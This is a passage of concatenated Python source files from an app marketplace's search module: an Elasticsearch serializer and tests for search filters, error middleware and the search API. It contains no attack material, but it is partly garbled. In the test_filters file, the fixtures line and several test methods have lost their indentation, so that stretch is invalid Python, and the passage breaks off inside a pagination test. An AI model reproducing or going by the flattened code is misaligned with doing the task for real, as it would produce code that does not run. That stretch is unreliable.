                           'reviewed', 'status', 'weekly_downloads'):
            setattr(obj, field_name, data.get(field_name))
        # Attach translations for all translated attributes.
        for field_name in ('name', 'description', 'homepage', 'support_email',
                           'support_url'):
            ESTranslationSerializerField.attach_translations(obj,
                data, field_name)
        ESTranslationSerializerField.attach_translations(obj._geodata,
            data, 'banner_message')
        ESTranslationSerializerField.attach_translations(obj._current_version,
            data, 'release_notes', target_name='releasenotes')
        # Set attributes that have a different name in ES.
        obj.public_stats = data['has_public_stats']
        # Override obj.get_region() with a static list of regions generated
        # from the region_exclusions stored in ES.
        obj.get_regions = obj.get_regions(obj.get_region_ids(restofworld=True,
            excluded=data['region_exclusions']))
        # Some methods below will need the raw data from ES, put it on obj.
        obj.es_data = data
        return obj
    def get_content_ratings(self, obj):
        # Rating body depends on the requesting region; 'generic' fallback.
        body = (mkt.regions.REGION_TO_RATINGS_BODY().get(
            self.context['request'].REGION.slug, 'generic'))
        return {
            'body': body,
            'rating': dehydrate_content_rating(
                (obj.es_data.get('content_ratings') or {})
                .get(body)) or None,
            'descriptors': dehydrate_descriptors(
                obj.es_data.get('content_descriptors', {})
            ).get(body, []),
            'interactives': dehydrate_interactives(
                obj.es_data.get('interactive_elements', [])),
        }
    def get_versions(self, obj):
        # Map version string -> API resource URI.
        return dict((v['version'], v['resource_uri'])
                    for v in obj.es_data['versions'])
    def get_ratings_aggregates(self, obj):
        return obj.es_data.get('ratings', {})
    def get_upsell(self, obj):
        # Only expose the upsell when it's available in the request region.
        upsell = obj.es_data.get('upsell', False)
        if upsell:
            region_id = self.context['request'].REGION.id
            exclusions = upsell.get('region_exclusions')
            if exclusions is not None and region_id not in exclusions:
                upsell['resource_uri'] = reverse('app-detail',
                                                kwargs={'pk': upsell['id']})
            else:
                upsell = False
        return upsell
    def get_absolute_url(self, obj):
        return absolutify(obj.get_absolute_url())
    def get_tags(self, obj):
        return obj.es_data['tags']
class SimpleESAppSerializer(ESAppSerializer):
    """ES-backed serializer restricted to SimpleAppSerializer's fields."""
    class Meta(SimpleAppSerializer.Meta):
        pass
class SuggestionsESAppSerializer(ESAppSerializer):
    """Minimal app payload for search suggestions."""
    icon = serializers.SerializerMethodField('get_icon')
    class Meta(ESAppSerializer.Meta):
        fields = ['name', 'description', 'absolute_url', 'icon']
    def get_icon(self, app):
        # URL of the 64px icon.
        return app.get_icon_url(64)
class RocketbarESAppSerializer(serializers.Serializer):
    """Serializer for Rocketbar suggestions built from ES suggest payloads."""
    name = ESTranslationSerializerField()
    @property
    def data(self):
        # self.object is a list of suggestion hits; serialize each payload.
        if self._data is None:
            self._data = [self.to_native(o['payload']) for o in self.object]
        return self._data
    def to_native(self, obj):
        # fake_app is a fake instance because we need to access a couple
        # properties and methods on Webapp. It should never hit the database.
        fake_app = Webapp(
            id=obj['id'], icon_type='image/png', type=amo.ADDON_WEBAPP,
            default_locale=obj.get('default_locale', settings.LANGUAGE_CODE),
            icon_hash=obj.get('icon_hash'),
            modified=datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S'))
        ESTranslationSerializerField.attach_translations(fake_app, obj, 'name')
        return {
            'name': self.fields['name'].field_to_native(fake_app, 'name'),
            'icon': fake_app.get_icon_url(64),
            'slug': obj['slug'],
            'manifest_url': obj['manifest_url'],
        }
########NEW FILE########
__FILENAME__ = test_filters
import json
import test_utils
from nose.tools import ok_
from django.contrib.auth.models import AnonymousUser
import amo
from addons.models import Category
from mkt import regions
from mkt.api.tests.test_oauth import BaseOAuth
from mkt.regions import set_region
from mkt.reviewers.forms import ApiReviewersSearchForm
from mkt.search.forms import (ApiSearchForm, DEVICE_CHOICES_IDS,
TARAKO_CATEGORIES_MAPPING)
from mkt.search.views import _filter_search
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestSearchFilters(BaseOAuth):
fixtures = fixture('webapp_337141', 'user_2519')
    def setUp(self):
        super(TestSearchFilters, self).setUp()
        # Anonymous request used as the base for every filter test.
        self.req = test_utils.RequestFactory().get('/')
        self.req.user = AnonymousUser()
        self.category = Category.objects.create(name='games', slug='games',
                                                type=amo.ADDON_WEBAPP)
        # Pick a region that has relatively few filters.
        set_region(regions.UK.slug)
        # Default form; individual tests may swap in another form class.
        self.form_class = ApiSearchForm
    def _grant(self, rules):
        # Grant permission rules to self.profile and refresh request groups.
        self.grant_permission(self.profile, rules)
        self.req.groups = self.profile.groups.all()
    def _filter(self, req, filters, sorting=None, **kwargs):
        """Return the built ES query dict, or the form errors if invalid."""
        form = self.form_class(filters)
        if form.is_valid():
            qs = Webapp.from_search(self.req, **kwargs)
            return _filter_search(
                self.req, qs, form.cleaned_data, sorting)._build_query()
        else:
            return form.errors.copy()
    def test_q(self):
        # A text query should appear in the built ES query.
        qs = self._filter(self.req, {'q': 'search terms'})
        qs_str = json.dumps(qs)
        ok_('"query": "search terms"' in qs_str)
        # TODO: Could do more checking here.
    def test_fuzzy_single_word(self):
        # Single-word queries get fuzzy matching.
        qs = self._filter(self.req, {'q': 'term'})
        qs_str = json.dumps(qs)
        ok_('fuzzy' in qs_str)
    def test_no_fuzzy_multi_word(self):
        # Multi-word queries should not use fuzzy matching.
        qs = self._filter(self.req, {'q': 'search terms'})
        qs_str = json.dumps(qs)
        ok_('fuzzy' not in qs_str)
    def _addon_type_check(self, query, expected=amo.ADDON_WEBAPP):
        # Assert the built query filters on the expected addon type.
        qs = self._filter(self.req, query)
        ok_({'term': {'type': expected}} in qs['filter']['and'],
            'Unexpected type. Expected: %s.' % expected)
    def test_addon_type(self):
        """Valid type values filter to ADDON_WEBAPP; bad values error."""
        # Test all that should end up being ADDON_WEBAPP.
        # Note: Addon type permission can't be checked here b/c the acl check
        # happens in the view, not the _filter_search call.
        self._addon_type_check({})
        self._addon_type_check({'type': 'app'})
        # Test a bad value.
        qs = self._filter(self.req, {'type': 'vindaloo'})
        ok_(u'Select a valid choice' in qs['type'][0])
    def _status_check(self, query, expected=amo.STATUS_PUBLIC):
        # Assert the built query filters on the expected status.
        qs = self._filter(self.req, query)
        ok_({'term': {'status': expected}} in qs['filter']['and'],
            'Unexpected status. Expected: %s.' % expected)
    def test_status(self):
        """Status values collapse to public without permission; bad error."""
        self.form_class = ApiReviewersSearchForm
        # Test all that should end up being public.
        # Note: Status permission can't be checked here b/c the acl check
        # happens in the view, not the _filter_search call.
        self._status_check({})
        self._status_check({'status': 'public'})
        self._status_check({'status': 'rejected'})
        # Test a bad value.
        qs = self._filter(self.req, {'status': 'vindaloo'})
        ok_(u'Select a valid choice' in qs['status'][0])
    def test_category(self):
        # Category slugs are matched with an 'in' filter.
        qs = self._filter(self.req, {'cat': self.category.slug})
        ok_({'in': {'category': [self.category.slug]}} in qs['filter']['and'])
    def test_tag(self):
        # Whitelisted tags become exact 'term' filters.
        qs = self._filter(self.req, {'tag': 'tarako'})
        ok_({'term': {'tags': 'tarako'}} in qs['filter']['and'], qs['filter']['and'])
def test_tarako_categories(self):
qs = self._filter(self.req, {'cat': 'tarako-lifestyle'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-lifestyle']}}
in qs['filter']['and'])
qs = self._filter(self.req, {'cat': 'tarako-games'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-games']}}
in qs['filter']['and'])
qs = self._filter(self.req, {'cat': 'tarako-tools'})
ok_({'in': {'category': TARAKO_CATEGORIES_MAPPING['tarako-tools']}}
in qs['filter']['and'])
def test_device(self):
qs = self._filter(self.req, {'device': 'desktop'})
ok_({'term': {
'device': DEVICE_CHOICES_IDS['desktop']}} in qs['filter']['and'])
def test_premium_types(self):
ptype = lambda p: amo.ADDON_PREMIUM_API_LOOKUP.get(p)
# Test a single premium type.
qs = self._filter(self.req, {'premium_types': ['free']})
ok_({'in': {'premium_type': [ptype('free')]}} in qs['filter']['and'])
# Test many premium types.
qs = self._filter(self.req, {'premium_types': ['free', 'free-inapp']})
ok_({'in': {'premium_type': [ptype('free'), ptype('free-inapp')]}}
in qs['filter']['and'])
# Test a non-existent premium type.
qs = self._filter(self.req, {'premium_types': ['free', 'platinum']})
ok_(u'Select a valid choice' in qs['premium_types'][0])
    def test_app_type(self):
        qs = self._filter(self.req, {'app_type': ['hosted']})
        ok_({'in': {'app_type': [1]}} in qs['filter']['and'])

    def test_manifest_url(self):
        url = 'http://hy.fr/manifest.webapp'
        qs = self._filter(self.req, {'manifest_url': url})
        ok_({'term': {'manifest_url': url}} in qs['filter']['and'])

    def test_offline(self):
        """Ensure we are filtering by offline-capable apps."""
        qs = self._filter(self.req, {'offline': 'True'})
        ok_({'term': {'is_offline': True}} in qs['filter']['and'])

    def test_online(self):
        """Ensure we are filtering by apps that require online access."""
        qs = self._filter(self.req, {'offline': 'False'})
        ok_({'term': {'is_offline': False}} in qs['filter']['and'])

    def test_offline_and_online(self):
        """Ensure we are not filtering by offline/online by default."""
        qs = self._filter(self.req, {})
        ok_({'term': {'is_offline': True}} not in qs['filter']['and'])
        ok_({'term': {'is_offline': False}} not in qs['filter']['and'])

    def test_languages(self):
        # 'languages' accepts a comma-separated list of locale codes.
        qs = self._filter(self.req, {'languages': 'fr'})
        ok_({'in': {'supported_locales': ['fr']}} in qs['filter']['and'])
        qs = self._filter(self.req, {'languages': 'ar,en-US'})
        ok_({'in': {'supported_locales': ['ar', 'en-US']}}
            in qs['filter']['and'])

    def test_region_exclusions(self):
        # Apps excluded from the request's region must be filtered out.
        qs = self._filter(self.req, {'q': 'search terms'}, region=regions.CO)
        ok_({'not': {'filter': {'term': {'region_exclusions': regions.CO.id}}}}
            in qs['filter']['and'])

    def test_region_exclusions_override(self):
        # The waffle flag disables region-exclusion filtering.
        self.create_flag('override-region-exclusion')
        qs = self._filter(self.req, {'q': 'search terms'}, region=regions.CO)
        ok_({'not': {'filter': {'term': {'region_exclusions': regions.CO.id}}}}
            not in qs['filter']['and'])
########NEW FILE########
__FILENAME__ = test_middleware
import mock
from nose.tools import eq_
from pyelasticsearch import exceptions
from test_utils import RequestFactory
import amo.tests
from mkt.search.middleware import ElasticsearchExceptionMiddleware as ESM
class TestElasticsearchExceptionMiddleware(amo.tests.TestCase):
    """ES backend errors render the search-down page; others propagate."""

    def setUp(self):
        self.request = RequestFactory()

    @mock.patch('mkt.search.middleware.render')
    def test_exceptions_we_catch(self, render_mock):
        # Each of these pyelasticsearch errors is instantiated with a status
        # code and an error string.
        caught_classes = (exceptions.ElasticHttpNotFoundError,
                          exceptions.IndexAlreadyExistsError,
                          exceptions.ElasticHttpError)
        for exc_class in caught_classes:
            ESM().process_exception(self.request, exc_class(503, 'ES ERROR'))
            render_mock.assert_called_with(self.request, 'search/down.html',
                                           status=503)
            render_mock.reset_mock()

    @mock.patch('mkt.search.middleware.render')
    def test_exceptions_we_do_not_catch(self, render_mock):
        # Non-ES exceptions must fall through untouched.
        ESM().process_exception(self.request, Exception)
        eq_(render_mock.called, False)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import json
from urlparse import urlparse
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
from django.http import QueryDict
from django.test.client import RequestFactory
from mock import MagicMock, patch
from nose.tools import eq_, ok_
import amo
import mkt
import mkt.regions
from access.middleware import ACLMiddleware
from addons.models import AddonCategory, AddonDeviceType, AddonUpsell, Category
from amo.helpers import absolutify
from amo.tests import app_factory, ESTestCase, TestCase, user_factory
from mkt.api.tests.test_oauth import RestOAuth, RestOAuthClient
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection
from mkt.constants import regions
from mkt.constants.features import FeatureProfile
from mkt.regions.middleware import RegionMiddleware
from mkt.search.forms import DEVICE_CHOICES_IDS
from mkt.search.serializers import SimpleESAppSerializer
from mkt.search.utils import S
from mkt.search.views import SearchView, DEFAULT_SORTING
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed, Webapp, WebappIndexer
from mkt.webapps.tasks import unindex_webapps
from tags.models import AddonTag, Tag
from translations.helpers import truncate
from users.models import UserProfile
class TestGetRegion(TestCase):
    """Tests for SearchView.get_region_from_request()."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.resource = SearchView()
        self.factory = RequestFactory()
        self.profile = UserProfile.objects.get(pk=2519)
        self.user = self.profile

    def region_for(self, region):
        # Build a fake API request (optionally carrying ?region=) and run it
        # through the region + ACL middleware before asking the view.
        req = self.factory.get('/', ({} if region is None else
                                     {'region': region}))
        req.API = True
        req.LANG = ''
        req.user = self.user
        req.amo_user = self.profile
        RegionMiddleware().process_request(req)
        ACLMiddleware().process_request(req)
        return self.resource.get_region_from_request(req)

    @patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_get_region_all(self, mock_request_region):
        geoip_fallback = regions.PE  # Different than the default (restofworld).
        mock_request_region.return_value = geoip_fallback
        # Test string values (should return region with that slug).
        eq_(self.region_for('restofworld'), regions.RESTOFWORLD)
        eq_(self.region_for('us'), regions.US)
        # Test fallback to request.REGION (should return GeoIP region if region
        # isn't specified or is specified and empty).
        eq_(self.region_for(None), geoip_fallback)
        eq_(self.region_for(''), geoip_fallback)
        # Test fallback to restofworld (e.g. if GeoIP fails).
        with patch('mkt.regions.middleware.RegionMiddleware.'
                   'process_request') as mock_process_request:
            eq_(self.region_for(None), regions.RESTOFWORLD)
            ok_(mock_process_request.called)

    def test_get_region_none(self):
        # The literal string 'None' disables region filtering entirely.
        eq_(self.region_for('None'), None)

    def test_get_region_worldwide(self):
        # Legacy 'worldwide' slug maps to restofworld.
        eq_(self.region_for('worldwide'), regions.RESTOFWORLD)
@patch('versions.models.Version.is_privileged', False)
class TestApi(RestOAuth, ESTestCase):
    """End-to-end tests for the anonymous search API endpoint.

    Fixes vs. the previous version:
    - test_pagination asserted ``next.path`` twice instead of checking the
      'previous' link's path; it now checks ``prev``.
    - The ES search-call counter monkeypatch is factored into a helper that
      restores ``es.search`` in a ``finally`` block, so a failing assertion
      no longer leaks the patch into other tests.
    - Locals no longer shadow the ``next`` builtin.
    """
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.client = RestOAuthClient(None)
        self.url = reverse('search-api')
        self.webapp = Webapp.objects.get(pk=337141)
        self.category = Category.objects.create(name='Books', slug='books',
                                                type=amo.ADDON_WEBAPP)
        self.webapp.icon_hash = 'fakehash'
        self.webapp.save()
        self.refresh('webapp')

    def tearDown(self):
        for w in Webapp.objects.all():
            w.delete()
        unindex_webapps(list(Webapp.with_deleted.values_list('id', flat=True)))
        super(TestApi, self).tearDown()

    def test_verbs(self):
        self._allowed_verbs(self.url, ['get'])

    def test_has_cors(self):
        self.assertCORS(self.client.get(self.url), 'get')

    def test_meta(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(set(res.json.keys()), set(['objects', 'meta']))
        eq_(res.json['meta']['total_count'], 1)

    def test_wrong_category(self):
        res = self.client.get(self.url,
                              data={'cat': self.category.slug + 'xq'})
        eq_(res.status_code, 400)
        eq_(res['Content-Type'], 'application/json')

    def test_wrong_weight(self):
        self.category.update(weight=-1)
        res = self.client.get(self.url, data={'cat': self.category.slug})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 0)

    def test_wrong_sort(self):
        res = self.client.get(self.url, data={'sort': 'awesomeness'})
        eq_(res.status_code, 400)

    def test_sort(self):
        # Mocked version, to make sure we are calling ES with the parameters
        # we want.
        with patch('mkt.webapps.models.Webapp.from_search') as mocked_search:
            mocked_qs = MagicMock()
            mocked_search.return_value = mocked_qs
            for api_sort, es_sort in DEFAULT_SORTING.items():
                res = self.client.get(self.url, [('sort', api_sort)])
                eq_(res.status_code, 200, res.content)
                mocked_qs.order_by.assert_called_with(es_sort)
        # Unmocked version, to make sure elasticsearch is actually accepting
        # the params.
        for api_sort, es_sort in DEFAULT_SORTING.items():
            res = self.client.get(self.url, [('sort', api_sort)])
            eq_(res.status_code, 200)

    def test_right_category(self):
        res = self.client.get(self.url, data={'cat': self.category.slug})
        eq_(res.status_code, 200)
        eq_(res.json['objects'], [])

    def create(self):
        # Put the fixture app in self.category and reindex it.
        AddonCategory.objects.create(addon=self.webapp, category=self.category)
        self.webapp.save()
        self.refresh('webapp')

    def test_right_category_present(self):
        self.create()
        res = self.client.get(self.url, data={'cat': self.category.slug})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 1)

    def test_tarako_category(self):
        self.create()
        # tarako-lifestyle includes books.
        res = self.client.get(self.url, data={'cat': 'tarako-lifestyle'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 1)
        # tarako-games includes only games.
        res = self.client.get(self.url, data={'cat': 'tarako-games'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)
        # tarako-tools includes multiple categories, but not books.
        res = self.client.get(self.url, data={'cat': 'tarako-tools'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)

    def test_user_info_with_shared_secret(self):
        user = UserProfile.objects.all()[0]

        def fakeauth(auth, req, **kw):
            req.user = user
            req.amo_user = user

        with patch('mkt.api.middleware.RestSharedSecretMiddleware'
                   '.process_request', fakeauth):
            with self.settings(SITE_URL=''):
                self.create()
            res = self.client.get(self.url, data={'cat': self.category.slug})
            obj = res.json['objects'][0]
            assert 'user' in obj

    def test_dehydrate(self):
        with self.settings(SITE_URL='http://hy.fr'):
            self.create()
            res = self.client.get(self.url, data={'cat': self.category.slug})
            eq_(res.status_code, 200)
            obj = res.json['objects'][0]
            content_ratings = obj['content_ratings']

            eq_(obj['absolute_url'],
                absolutify(self.webapp.get_absolute_url()))
            eq_(obj['app_type'], self.webapp.app_type)
            eq_(content_ratings['body'], 'generic')
            eq_(content_ratings['rating'], None)
            eq_(content_ratings['descriptors'], [])
            eq_(content_ratings['interactives'], [])
            eq_(obj['current_version'], u'1.0')
            eq_(obj['description'],
                {'en-US': self.webapp.description.localized_string})
            eq_(obj['icons']['128'], self.webapp.get_icon_url(128))
            ok_(obj['icons']['128'].endswith('?modified=fakehash'))
            eq_(obj['id'], long(self.webapp.id))
            eq_(obj['manifest_url'], self.webapp.get_manifest_url())
            eq_(obj['payment_account'], None)
            self.assertApiUrlEqual(obj['privacy_policy'],
                                   '/apps/app/337141/privacy/')
            eq_(obj['public_stats'], self.webapp.public_stats)
            eq_(obj['ratings'], {'average': 0.0, 'count': 0})
            self.assertApiUrlEqual(obj['resource_uri'],
                                   '/apps/app/337141/')
            eq_(obj['slug'], self.webapp.app_slug)
            eq_(obj['supported_locales'], ['en-US', 'es', 'pt-BR'])
            eq_(obj['tags'], [])
            ok_('1.0' in obj['versions'])
            self.assertApiUrlEqual(obj['versions']['1.0'],
                                   '/apps/versions/1268829/')
        # These only exists if requested by a reviewer.
        ok_('latest_version' not in obj)
        ok_('reviewer_flags' not in obj)

    @patch('mkt.webapps.models.Webapp.get_excluded_region_ids')
    def test_upsell(self, get_excluded_region_ids):
        get_excluded_region_ids.return_value = []
        upsell = app_factory(premium_type=amo.ADDON_PREMIUM)
        AddonUpsell.objects.create(free=self.webapp, premium=upsell)
        self.webapp.save()
        self.refresh('webapp')

        res = self.client.get(self.url, {'premium_types': 'free'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        obj = res.json['objects'][0]
        eq_(obj['upsell']['id'], upsell.id)
        eq_(obj['upsell']['app_slug'], upsell.app_slug)
        eq_(obj['upsell']['name'], upsell.name)
        eq_(obj['upsell']['icon_url'], upsell.get_icon_url(128))
        self.assertApiUrlEqual(obj['upsell']['resource_uri'],
                               '/apps/app/%s/' % upsell.id)
        eq_(obj['upsell']['region_exclusions'], [])

        upsell.delete()
        unindex_webapps([upsell.id])

    def test_dehydrate_regions(self):
        self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.webapp.save()
        self.refresh('webapp')

        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        regions = obj['regions']
        ok_(mkt.regions.BR.slug not in [r['slug'] for r in regions])
        eq_(len(regions), len(mkt.regions.ALL_REGION_IDS) - 1)

    def test_region_filtering(self):
        self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.webapp.save()
        self.refresh('webapp')

        res = self.client.get(self.url, data={'region': 'br'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)

    def test_languages_filtering(self):
        # This webapp's supported_locales: [u'en-US', u'es', u'pt-BR']
        res = self.client.get(self.url, data={'languages': 'fr'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)

        for lang in ('fr,pt-BR', 'es, pt-BR', 'es', 'pt-BR'):
            res = self.client.get(self.url, data={'languages': lang})
            eq_(res.status_code, 200)
            obj = res.json['objects'][0]
            eq_(obj['slug'], self.webapp.app_slug)

    def test_offline_filtering(self):
        def check(offline, visible):
            res = self.client.get(self.url, data={'offline': offline})
            eq_(res.status_code, 200)
            objs = res.json['objects']
            eq_(len(objs), int(visible))

        # Should NOT show up in offline.
        # Should show up in online.
        # Should show up everywhere if not filtered.
        check(offline='True', visible=False)
        check(offline='False', visible=True)
        check(offline='None', visible=True)

        # Mark that app is capable offline.
        self.webapp.update(is_packaged=True)
        self.refresh('webapp')

        # Should show up in offline.
        # Should NOT show up in online.
        # Should show up everywhere if not filtered.
        check(offline='True', visible=True)
        check(offline='False', visible=False)
        check(offline='None', visible=True)

    def test_q(self):
        res = self.client.get(self.url, data={'q': 'something'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def _assert_single_es_search(self, query, expected_count):
        """Run a search and verify exactly one ES search call was issued.

        Returns the response so callers can make further assertions. The
        monkeypatched ``es.search`` is always restored, even on failure.
        """
        es = WebappIndexer.get_es()
        orig_search = es.search
        es.counter = 0

        def monkey_search(*args, **kwargs):
            es.counter += 1
            return orig_search(*args, **kwargs)

        es.search = monkey_search
        try:
            res = self.client.get(self.url, data={'q': query})
            eq_(res.status_code, 200)
            eq_(res.json['meta']['total_count'], expected_count)
            eq_(len(res.json['objects']), expected_count)
            # Verify only one search call was made.
            eq_(es.counter, 1)
            return res
        finally:
            es.search = orig_search

    def test_q_num_requests(self):
        res = self._assert_single_es_search('something', 1)
        eq_(res.json['objects'][0]['slug'], self.webapp.app_slug)

    def test_q_num_requests_no_results(self):
        self._assert_single_es_search('noresults', 0)

    def test_q_exact(self):
        app1 = app_factory(name='test app test11')
        app2 = app_factory(name='test app test21')
        app3 = app_factory(name='test app test31')
        self.refresh('webapp')

        res = self.client.get(self.url, data={'q': 'test app test21'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 3)

        # app2 should be first since it's an exact match and is boosted higher.
        obj = res.json['objects'][0]
        eq_(obj['slug'], app2.app_slug)

        app1.delete()
        app2.delete()
        app3.delete()
        unindex_webapps([app1.id, app2.id, app3.id])

    def test_q_is_tag(self):
        Tag(tag_text='whatsupp').save_tag(self.webapp)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'q': 'whatsupp'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_q_is_tag_misspelled(self):
        Tag(tag_text='whatsapp').save_tag(self.webapp)
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'q': 'whatsupp'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_fuzzy_match(self):
        res = self.client.get(self.url, data={'q': 'soemthing'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_icu_folding(self):
        # Accented characters should fold to their ASCII equivalents.
        self.webapp.name = {'es': 'Páginas Amarillos'}
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'q': 'paginas'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_camel_case_word_splitting(self):
        self.webapp.name = 'AirCombat'
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'q': 'air combat'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_phrase_slop(self):
        self.webapp.name = {'es': 'Metro de Santiago',
                            'en': None}
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'q': 'metro santiago'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_name_localized(self):
        # First test no ?lang parameter returns all localizations.
        res = self.client.get(self.url, data={'q': 'something'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        eq_(obj['name'], {u'en-US': u'Something Something Steamcube!',
                          u'es': u'Algo Algo Steamcube!'})

        # Second test that adding ?lang returns only that localization.
        res = self.client.get(self.url,
                              data={'q': 'something', 'lang': 'es'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        eq_(obj['name'], u'Algo Algo Steamcube!')

    def test_other_localized(self):
        # Test fields that should be localized.
        translations = {'en-US': u'Test in English',
                        'es': u'Test in Español'}
        self.webapp.homepage = translations
        self.webapp.support_email = translations
        self.webapp.support_url = translations
        self.webapp.save()
        self.refresh('webapp')

        res = self.client.get(self.url, data={'q': 'something'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['homepage'], translations)
        eq_(obj['support_email'], translations)
        eq_(obj['support_url'], translations)

    def test_name_localized_to_default_locale(self):
        self.webapp.update(default_locale='es')
        self.refresh('webapp')

        # Make a request in another language that we know will fail.
        res = self.client.get(self.url,
                              data={'q': 'something', 'lang': 'de'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)
        eq_(obj['name'], u'Algo Algo Steamcube!')

    def test_device(self):
        AddonDeviceType.objects.create(
            addon=self.webapp, device_type=DEVICE_CHOICES_IDS['desktop'])
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'device': 'desktop'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_no_flash_on_firefoxos(self):
        AddonDeviceType.objects.create(
            addon=self.webapp, device_type=DEVICE_CHOICES_IDS['firefoxos'])
        f = self.webapp.get_latest_file()
        f.uses_flash = True
        f.save()
        self.webapp.save()
        self.refresh('webapp')
        res = self.client.get(self.url, data={'dev': 'firefoxos'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 0)

    def test_premium_types(self):
        res = self.client.get(self.url,
                              data={'premium_types': 'free'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_premium_types_empty(self):
        res = self.client.get(self.url,
                              data={'premium_types': 'premium'})
        eq_(res.status_code, 200)
        objs = res.json['objects']
        eq_(len(objs), 0)

    def test_multiple_premium_types(self):
        res = self.client.get(self.url,
                              data={'premium_types': ['free', 'premium']})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_app_type_hosted(self):
        res = self.client.get(self.url,
                              data={'app_type': 'hosted'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_app_type_packaged(self):
        self.webapp.update(is_packaged=True)
        self.refresh('webapp')

        res = self.client.get(self.url,
                              data={'app_type': 'packaged'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_app_type_privileged(self):
        # Override the class-decorated patch.
        with patch('versions.models.Version.is_privileged', True):
            self.webapp.update(is_packaged=True)
            self.refresh('webapp')

            # Privileged apps must not match plain 'packaged'...
            res = self.client.get(self.url,
                                  data={'app_type': 'packaged'})
            eq_(res.status_code, 200)
            eq_(len(res.json['objects']), 0)

            # ...only 'privileged'.
            res = self.client.get(self.url,
                                  data={'app_type': 'privileged'})
            eq_(res.status_code, 200)
            eq_(len(res.json['objects']), 1)
            obj = res.json['objects'][0]
            eq_(obj['slug'], self.webapp.app_slug)

    def test_status_value_packaged(self):
        # When packaged and not a reviewer we exclude latest version status.
        self.webapp.update(is_packaged=True)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['status'], amo.STATUS_PUBLIC)
        eq_('latest_version' in obj, False)

    def test_addon_type_anon(self):
        res = self.client.get(self.url, data={'type': 'app'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

        res = self.client.get(self.url, data={'type': 'vindaloo'})
        eq_(res.status_code, 400)
        error = res.json['detail']
        eq_(error.keys(), ['type'])

    def test_word_delimiter_preserves_original(self):
        self.webapp.description = {
            'en-US': 'This is testing word delimiting preservation in long '
                     'descriptions and here is what we want to find: WhatsApp'
        }
        self.webapp.save()
        self.reindex(Webapp, 'webapp')

        res = self.client.get(self.url, data={'q': 'whatsapp'})
        eq_(res.status_code, 200)
        obj = res.json['objects'][0]
        eq_(obj['slug'], self.webapp.app_slug)

    def test_pagination(self):
        Webapp.objects.get(pk=337141).delete()
        app1 = app_factory(name='test app test1')
        app2 = app_factory(name='test app test2')
        app3 = app_factory(name='test app test3')
        # Setting 'created' in app_factory is unreliable and we need a
        # reliable order.
        app1.update(created=self.days_ago(1))
        app2.update(created=self.days_ago(2))
        app3.update(created=self.days_ago(3))
        self.refresh('webapp')

